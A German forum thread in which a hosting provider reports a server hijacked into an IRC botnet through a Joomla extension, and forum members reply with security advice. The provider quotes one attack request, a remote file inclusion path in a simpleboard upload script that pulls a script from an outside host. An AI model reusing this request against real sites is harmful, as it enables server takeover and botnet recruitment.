Botnet.

Bin Provider, und dank eurem JoomlaModul
/cms/components/com_simpleboard/image_upload.php?sbp=http://www.yenzero.com/wp-admin/c.in??
wurde gerade erfolgreich ein server kompromittiert, und in ein irc-botnet eingegliedert. das habe ich ihm zwar ausgetrieben, aber ich gedenke ebenso joomla auf meinen servern zu verbieten, wenn solch käse möglich wird

hallo lieber provider,
danke für ihre netten worte. ich denke, sie haben dem footer unseres forums keine beachtung geschenkt, da ihnen sonst aufgefallen wäre, das wir das von ihnen gemeinte forum nicht einsetzen.
desweiteren, wenn ein benutzer von joomla, dies gilt allgemein - also auch für andere content management systeme, nicht weis oder es versäumt seine installation sicher zu machen, können sie nicht das eingesetzte system für verantwortlich machen.
und zu dem betrifft es offensichtlich nicht einmal joomla selber, sondern eine erweiterung. auch hier gilt, jeder benutzer sollte regelmäßig darauf achten, das er nur aktuelle versionen einsetzt. wir hier versuchen support zu liefern, tipps zu geben, was man machen kann mit joomla und vor allen menschen, die fragen haben, diese fachmänisch zu beantworten. teils kommen diese antworten auch von anderen besuchern unseres forums.
und wie sie sehen können, versuchen wir auch ihnen zu helfen! joomla als solches wurde auf einem hack-kontest als eins der besten beurteilt. also nicht hackbar! und wenn man hört: ui, meine seite wurde gehackt, dann stellt man schnell fest, das es nicht durch joomla selber, sonder durch eine schlecht erstellte erweiterung passiert ist oder aber der betroffene es versäumt hat, seine seiten sicher zu machen. es kann also viele gründe geben, wasrum soetwas passieren kann. dies betrifft allerdings auch andere systeme und ist kein joomla-spezifisches!
ich hoffe, sie werden ihre meinung überdenken!
in dem sinne, noch einen schönen tag

Hallo wwgernot,
von mir nur kurz ein paar Ergänzungen zu NiKs Ausführungen G_O_O_D O_O_D .
1. Du schreibst von "eurem JoomlaModul", hier muss wohl ein Irrtum deinerseits vorliegen. Dieses Modul wurde meines Wissens nicht von uns entwickelt!

2. Ein CMS-System nur deshalb gleich niederzumachen, empfinde sicherlich nicht nur ich als sehr unprofessionelle Einstellung für einen Provider! Schließlich bieten viele der größten Hoster selbst dieses CMS System ihren Kunden direkt an.

3. Joomla auf deinen Servern "verbieten" zu wollen, schiesst dann aber wirklich den Vogel ab... lol

ich habe keine möglichkeit, als nicht-joomla mensch festzustellen was von euch ist und was nicht. kann mir schon denken, das ein system nicht lange lebt, wenn jeder 2te rechner damit übernommen werden kann, und damit auch wird.

habt ihr also möglichkeiten, automatisiert festzustellen, was sicherheitsgeprüft ist, oder von euch, etwas inder art?

Hallo,
auf der offiziellen Webseite der Joomla!-Entwickler gibt es eine Liste mit der Einschätzung, ob die Erweiterungen Sicherheitslücken enthält und ob ein Update verfügbar ist. Sie ist hier zu finden: --ALTER LINK WURDE ENTFERNT-- Es ist aber keine 100% Garantie, dass die Erweiterungen absolut sicher sind! - Übrigens: Absolute Sicherheit gibt es sowieso nicht!!!
Wenn Dein Kunde immer die aktuellste Joomla!-Version und die aktuellsten Patches für seine Komponenten drauf hat und zusätzlich einige Regeln (Dateiberechtigungen, Schutz wichtiger Verzeichnisse mit htaccess, kaum Extensions) beachtet, ist Joomla! so sicher wie nur möglich.

Cu, Jan.

wwgernot schrieb: ich habe keine möglichkeit, als nicht-joomla mensch festzustellen was von euch ist und was nicht. kann mir schon denken, das ein system nicht lange lebt, wenn jeder 2te rechner damit übernommen werden kann, und damit auch wird.

habt ihr also möglichkeiten, automatisiert festzustellen, was sicherheitsgeprüft ist, oder von euch, etwas inder art?

Es lässt sich feststellen was von Joomlaportal ist oder nicht, den jede Komponente, jedes Modul,und jeder Bot das von Joomlaportal stammt enthält einen Hinweis darauf in jeder Datei .

rluethi schrieb:

wwgernot schrieb: ich habe keine möglichkeit, als nicht-joomla mensch festzustellen was von euch ist und was nicht. kann mir schon denken, das ein system nicht lange lebt, wenn jeder 2te rechner damit übernommen werden kann, und damit auch wird.

habt ihr also möglichkeiten, automatisiert festzustellen, was sicherheitsgeprüft ist, oder von euch, etwas inder art?

Es lässt sich feststellen was von Joomlaportal ist oder nicht, den jede Komponente, jedes Modul,und jeder Bot das von Joomlaportal stammt enthält einen Hinweis darauf in jeder Datei .

Hi .. .

Und auf was willst Du hinaus ??

Gruess

Pete